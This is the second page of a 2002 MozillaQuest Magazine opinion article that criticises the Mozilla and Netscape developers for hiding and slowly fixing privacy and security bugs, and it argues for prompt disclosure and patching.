Advertise on MozillaQuest Magazine Free Software for Your New Christmas Computer -- Or Any Computer for That Matter - Open Source Software MozillaQuest MQ Logo
MozillaQuest the on-line computer magazine
September 30, 2002
About Computers On-Line

RisingNet

EPIX Internet Services
MozillaQuest Magazine Front Page button

Internet & Web browsers button

custom Netscape & Mozilla themes & skins button

Digital Photography

Graphics

IRC - Internet Relay Chat - Chat button

Linux buttonLinux for Windows Users

Mozilla button

Multimedia

Netscape button
network articles

tutorial - help - how to button

Web Page Design

Web Tools

Windows button
..
..

The Mozilla 1.0 Web browser suite is out! MozillaQuest Magazine has the best, most balanced, accurate, robust and in-depth coverage of AOL-Netscape's Mozilla 1.0 browser on the Internet. I'ts all on MozillaQuest Magazine.

Zero Tolerance for Privacy and Security Bugs

Mozilla and Netscape JavaScript Bugs Compromise Privacy and Security

Mike Angelo -- 30 September 2002 (c) - Page 2


Article Index

Anatomy of Mozilla Bug #145579

A Pattern of Known, Un-Fixed, Privacy Bugs in the Mozilla-Netscape Browsers

  • Oingo Bugs Fiasco
  • Mozilla Bug #32571

Duty To Disclose and To Fix Privacy and Security Bugs

Conclusion

Resources

Duty To Disclose and To Fix Privacy and Security Bugs

It certainly is curious that the Mozilla-Netscape developers did not fix Bug #145579 until after it was brought to public attention via Bugtraq. How many privacy and security bugs are in the Mozilla-Netscape code-base that are being kept secret from the public and not being fixed? Moreover, how many privacy and security bugs that are not hidden, such as Mozilla Bug #32571 and all its duplicates are not being fixed timely?

It is past time for the Mozilla-Netscape developers to bring the status of Mozilla-Netscape privacy and security bugs and issues into the full light of day and Sun. Users of the Mozilla, Netscape, and other Mozilla-based browsers and products have a right to know just how safe or vulnerable are their system security and individual privacy when using Mozilla-Netscape and other Mozilla-based related products.

Of course there are legitimate concerns about giving potential crackers and others that would invade your privacy and/or attack your system a leg-up if the details of privacy and security bugs are revealed prematurely. However, we believe that such bugs can be listed and announced in a manner to alert users to privacy and security flaws in the Mozilla-Netscape code-base without giving sufficient detail to aid evildoers.

This duty to let users of computers know immediately about privacy and security violation exposures is not only applicable to the Mozilla-Netscape browser-suites and other Mozilla-based products. This duty and obligation to immediately advise computer users of privacy and security violation exposures is incumbent on all producers and vendors of computer products.

Moreover, we believe that producers and vendors of computer products should provide patches and/or upgrades that fix privacy and security violation exposures within 24-hours of a computer product producer's or vendor's knowledge of such exposures or risks.

We think that is reasonable. Computer products should not be released with privacy and security violation exposures and risks. Twenty-four hours to fix privacy and security violation exposures and risks is not unreasonable in light of the fact that computer products users are being subjected to such privacy and security violation exposures and risks -- until such time as privacy and security violation exposures or risks are publicly announced and fixed.

And if that means company big-shots as well as the little-shots have to go without sleep until the privacy and security violation exposures and risks they created and distributed are fixed -- well then tough! If this sounds harsh, its is. But it is time people started taking responsibility for their wrongdoings -- and releasing computer products with privacy and security violation exposures and risks is wrong.

AOL-Netscape and its Mozilla Organization allowing a security and data loss problem such as that reported in Mozilla Bug #32571 and its progeny to go more than two years without correction is a disgraceful travesty! Four months to disclose and fix Mozilla Bug #145579 is unacceptable. Releasing Mozilla 1.0 with the Oingo bugs was willfully negligent conduct. (Links to all mentioned bugs in the Resources section at the end of this article.)

Certainly there will be instances where privacy and security violation exposures and risks slip through even the best of product development and quality control programs. But immediate announcement of such privacy and security violation exposures and risks when discovered -- and their immediate correction -- goes to the integrity of computer product developers and producers -- and the quality of their products.

On the other hand trying to hide the existence of privacy and security violation exposures and risks from the light of day and from public attention goes to the lack of integrity of computer product producers and developers. Failure to immediately correct privacy and security violation exposures and risks goes to the lack of integrity of computer product developers and producers.

In the case of Mozilla Bug #145579 the AOL-Netscape-Mozilla people knew the privacy violation exposures and risks described by Bug #145579 were in the Mozilla-Netscape code. Yet they released not merely one product with the #145579 bug in it, they released several editions of their products with that bug in it. And that in our opinion is gross moral dishonesty!

Mozilla Bug #82275 is an example of a bug that is hidden from public view. This Bug #82275 was reported in May 2001 -- and it still is hidden from public view. For a hint of what Bug #82275 is about you can check Bug #86497, if you like. From Bug #86497, Bug #82275 does not appear to be a big deal. The point however, is that it is hidden from public view even though that bug was reported more than a year ago. Please see Figure 3.

Figure 3. Bug #82275 is hidden from open, public view. How many more bugs are the AOL-Netscape-Mozilla developers hiding from open, public view. Is hiding a bug report from open view for more than a year appropriate in Open Source Software?

Consider Mozilla privacy Bug #57351, css on a:visited can load an image and/or reveal if visitor been to a site. It has been around for nearly two years. It's a P3 priority, major, bug targeted for Mozilla 1.2a. It's not hidden but its not fixed either. Bug #32571 has been in the Mozilla-Netscape code-base for more than two years. Just how many privacy and security bugs and issues are in the Mozilla code-base -- whether hidden or public? (Links to all mentioned bugs in the Resources section at the end of this article.)

We have a link to some 25 privacy and security bugs that were fixed between the Mozilla 1.0 release and the Mozilla 1.0.1 release in the Resources section at the end of this article. Please keep in mind that if you used and/or are still using Mozilla 1.0, you have these 25 bugs in your copy of the Mozilla browser suite. Mozilla bug reports with numbers lower than 149219 were filed prior to 5 June 2002, the day Mozilla 1.0 was released. Ten of those twenty-five bugs were known when Mozilla 1.0 was released -- unforgivable!

Here, with Mozilla Bug #145579, the Mozilla-Netscape developers over-used the excuse of confidentiality in order to publish several releases of their browser-suites with a known-to-them privacy problem. It was not until Sven Neuhaus made the privacy issues reported in Mozilla Bug #145579 public via his Bugtraq posting that Bug Report #145579 was made public and the bug fixed.

There is no announcement of this Mozilla Bug #145579 on the Mozilla Organization main Web site page. Nor did we find any announcement of the bug in AOL-Netscape's Browser Central page. That in our opinion is gross moral dishonesty!

Note: In this article, the focus has been primarily on the Mozilla browser suite with some mention of the Mozilla-based AOL-Netscape 6.x and 7.x browser suites. However, AOL is reported to be using the Mozilla Gecko layout engine for its CompuServe client software and testing Gecko for its AOL client software.

Are there hidden and/or privacy and security bugs in the Gecko versions used in and being tested for use in AOL and CompuServe client software? Is AOL releasing or testing AOL and CompuServe client software with known privacy and security bugs and issues? As long as AOL-Netscape and its Mozilla Organization have a policy of hiding privacy and security bugs and of releasing products with known privacy and security bugs without calling them to public attention, it certainly could be doing that.

In light of the Mozilla-Netscape developers intentionally releasing browsers with known-to-them privacy and security bugs, they ought to make all security-sensitive, nsconf (Netscape Confidential), and any other hidden bugs public forthwith. The public has a right to know to what privacy invasions and security exploits they are subject by using the Mozilla, Netscape, and Mozilla-based browsers.

If the Mozilla-Netscape developers fail so to make these hidden bugs public without delay, then anyone who has access to the hidden bugs in the Mozilla Bugzilla database ought to have the courage and moral fiber to do as Sven Neuhaus did and post the information about those bugs to Bugtraq forthwith!

Conclusion

In the meantime, we strongly recommend that you turn JavaScript off in Mozilla, Netscape, and other Mozilla-based browsers -- if AOL-Netscape's Mozilla Organization's callous disregard for your privacy and the security of your system has not already caused you to switch to a better browser.

AOL-Netscape's Mozilla Project is supposed to be an Open Source Software project. However, it has been hiding and covering up privacy and security problems for months and years.

Should an Open Source Software project hide and cover up privacy and security problems in its products -- for months and years? We do not think so. Open means Open!




For more information about how Mozilla bugs impact on the user experience in general, please see our articles A Quick Look at Some Mozilla 1.0 Browser-Suite Annoyances, Bugs, And Issues, Mozilla 1.0 Browser Quick Look, and Mozilla 1.0 Browser-Suite's E-Mail & News Quick Look Incidentally, please check the MozillaQuest Magazine front-page (mozillaquest.com) sidebar every now and then for bug-count updates and for upcoming Mozilla Milestone progress updates.




Resources


Sven Neuhaus' Bugtraq posting, privacy leak in Mozilla


Bugs


Bug #32571

Bug #57351

Bug #82275

Bug #86497

Bug #145579

Bug #170165

Bugs Fixed Bewteen Mozilla 1.0 Release and the Mozilla 1.0.1 and 1.1 releases.


Related Articles


Mozilla 1.2-alpha Browser-Suite Released

Mozilla 1.0.1 Browser-Suite Released

Netscape 7.0 Browser-Suite Released

Mozilla 1.1 Browser-Suite Released



Mozilla 1.0-RC1 Browser-Suite Sneak Preview

Mozilla 1.0 on the Way -- Milestone 1.0-RC1 Branched


Netscape 6.2.2 Browser-Suite Released

Is Mozilla Actually AOL-Netscape's Mozilla?


Mozilla Milestone 0.9.9 Branched Behind Schedule


Year 2001 in Review -- Mozilla and Netscape Browsers

Mozilla Roadmap Update: Moz 1.0 April Release Confirmed & Post-1.0 Development Plan Announced


Mozilla Roadmap Update: Mozilla 1.0 Set Back to April 2002



AOL 7.0: Good News for AOL Users & Microsoft - Bad News for Netscape & Mozilla


Netscape 6.2.1 Browser-Suite Released

Netscape Communicator 4.79 Browser-Suite Released

Netscape 6.2 Browser Source Code (Mozilla 0.9.4.1) Released

Netscape 6.2 Browser-Suite Released

Netscape 6.2 Browser-Suite Coming Soon?

Netscape 6.1 Browser-Suite Released, Again?


Mozilla 0.9.x Releases & Download Links


Mozilla Milestone 0.9.8 Browser-Suite Released

Mozilla Milestone 0.9.7 Browser-Suite Released

Mozilla Milestone 0.9.6 Browser-Suite Released

Mozilla Milestone 0.9.5 Browser-Suite Released


Mozilla Milestone 0.9.4 Browser-Suite Released

Mozilla Milestone 0.9.3 Browser-Suite Released

Mozilla 0.9.2.1 AKA Netscape 6.1 Browser Source Code Released


Mozilla 0.9.3 Branched Behind Schedule & Buggy

Mozilla Milestone 0.9.1 Browser-Suite Released

The Snail Moves: Mozilla Milestone 0.9 Browser-Suite Released


Mozilla Roadmap

More Mozilla Roadmap Plan Changes and Chaos - Mozilla 0.9.2 Set for 25 June Release (June Roadmap revisions)

Mozilla Roadmap Plan Changed Again -- Mozilla 1.0 Set Back to Q4 2001 (May Roadmap revisions)

More Mozilla Roadmap & Development Plan Changes: Mozilla 1.0 Pushed Back to Q3 2001 (April Roadmap revisions)

Mozilla 1.0 Release Pushed Back -- Milestone 0.8.1 Inserted into Development Roadmap Schedule (March Roadmap revisions)

Mozilla Organization Revises Development Roadmap and Product Release Schedule (December Roadmap revisions)


Mozilla 0.8.x Releases & Download Links

Lizard On The Move: Mozilla Milestone 0.8.1 Browser-Suite Released

The Lizard Marches On: Mozilla Milestone 0.8 Browser-Suite Released

Mozilla Milestone 0.8 Browser-Suite RPM Builds Released


Other Related Mozilla & Netscape Articles

Composer: The Netscape & Mozilla Graphical HTML Editor & Word Processor

Netscape 6.1 Browser-Suite Released Again?

How To Download, Install, & Configure Netscape 6 -- Safely!


MozillaQuest the Series: Building Your Own Mozilla-Based Web Browser

Meet Bugzilla -- Mozilla's Secretary of Bug-Busting & Feature Requests Lizard


For more information about the Mozilla Organization, the Mozilla applications programming framework, and the Mozilla browser, please see:

Please do not forget to report bugs, problems, or suggestions for enhancements to Bugzilla.

For more information about the Mozilla Roadmap & Milestone Plan, please see:

Mozilla Development Roadmap

Help Using The Bugzilla Query Form


Copyright 2000-2002 -- MozillaQuest -- Brodheadsville, Pa..USA -- All Rights Reserved


Recent Articles

A New Mug for Bugzilla - Version 2.16 on Its Way

Netscape 6.2.1 Browser-Suite Released

Belkin SCSI to USB Adapter for Mac & Windows - Add SCSI to Laptop, Notebook, & Desktop Computers

Getting Started with Wireless Network Technology Part I: A Simple Wireless Computer Connection for Home, Office, or School

Getting Started with Wireless Network Technology Part I: A Simple Wireless Computer Connection for Home, Office, or School

Mozilla Milestone 0.9.6 Browser-Suite Released

Netscape Communicator 4.79 Browser-Suite Released

Mozilla Roadmap Update - Mozilla 1.0 Set Back to April 2002

Netscape 6.2 Browser Source Code (Mozilla 0.9.4.1) Released

Mandrake Linux 8.1 Boxed CDs Available Now

SuSE Linux 7.3 Ships In North America

Red Hat Linux 7.2 Distribution Released

AOL 7.0: Good News for AOL Users & Microsoft - Bad News for Netscape & Mozilla

Mozilla Milestone 0.9.5 Browser-Suite Released

Mozilla Organization Opposes W3C (RAND) Patent Policy Proposal

Mozilla 0.9.5 Branched -- Buggier Than Ever

Patch Maker -- Mozilla Hacking & Patching Made Easy

SuSE Linux 7.3 Set for October 22 Release

Mandrake Linux 8.1 Released for Downloading

Belkin 4-Port USB Switch for Linux, Mac, & Windows

World Trade Center & Pentagon Aircraft-Bombings - Terrorism ? The Third World War - 11 September Massacre

Laptop & Notebook Docking -- Peripheral Device Sharing

Milestone 0.9.4 Delayed - Turbo Mode & Bugs Slow Mozilla Development to Snail´s Pace - Turbo/Quick-Launch Examined -- Is Mozilla Really Open Source?

Milestone 0.9.4 Delayed - Turbo Mode & Bugs Slow Mozilla Development to Snail´s Pace - Turbo/Quick-Launch Examined -- Is Mozilla Really Open Source?

Netscape Lays-Off Mozilla's Chief Lizard Wrangler, Mitchell Baker, & Others?

SuSE Linux Free for US High Schools

Mozilla Roadmap Update - Mozilla 1.0 Release Set Back to 2002 - Mozilla 0.9.4 Set for 7 September Release

Red Hat E-Commerce Suite - Open Source Software Plus Commercial Tools, Services, & Support

KDE 2.2 Released - Binaries and Source Code Available for Downloading

Caldera OpenLinux Workstation 3.1 - review

Caldera OpenLinux 3.1 - Open UNIX 8

Mozilla 0.9.2 Branches on Schedule, but with Many Bugs

Is Netscape Losing the Browser Wars? Part II: Why Are Major Linux Distributions Rejecting Netscape 6?

Is Netscape losing browser war

Red Hat Linux drops Netscape browser

Linux for Microsoft Windows Users #5: Simple Number Crunching, Word Processing, & Photo Viewing with the Windows-Like Desktop for Linux

AbiWord - A Free, Decent, MS Word Clone for the Linux, MS Windows, & Other Platforms

Linux for Microsoft Windows Users: #4-- Getting Started Using the Windows-Like Desktop for Linux

Linux for Microsoft Windows Users: #3 -- Making an MS Windows-Like Desktop for Red Hat Linux

Composer: The Netscape & Mozilla Graphical HTML Editor & Word Processor

Mozilla Milestone 0.8 Browser-Suite RPM Builds Released

Linux for Microsoft Windows Users: #2 -Getting Started with The Linux MS Windows-Like Desktop

Triple-Boot Caldera OpenLinux, Red Hat Linux, & MS Windows for Best of Three Worlds

Linux for Microsoft Windows Users: Introduction & Overview

Meet Bugzilla -- Mozilla's Secretary of Bug-Busting & Feature Requests Lizard

Computer Connections at Home, Office, & School

Some Basics for Computing & Networking Novices

dual-boot Linux & windows for best of both operating system worlds

New Browser War Heats Up -- But It's Netscape vs. Netscape

MozillaQuest the Series -- Building Your Own Mozilla-Based Web Browser:Branding your Lizard

How to Download,, Install, & Configure Netscape 6.0 Safely

MozillaQuest the Series -- Building Your Own Mozilla-Based Web Browser:Skinning the Lizard

MozillaQuest Magic: Enabling Changes Made to Mozilla-Based Browsers & Applications Chrome -- A Tutorial

Mozilla's ChatZilla, The Lizard Speaks:- IRC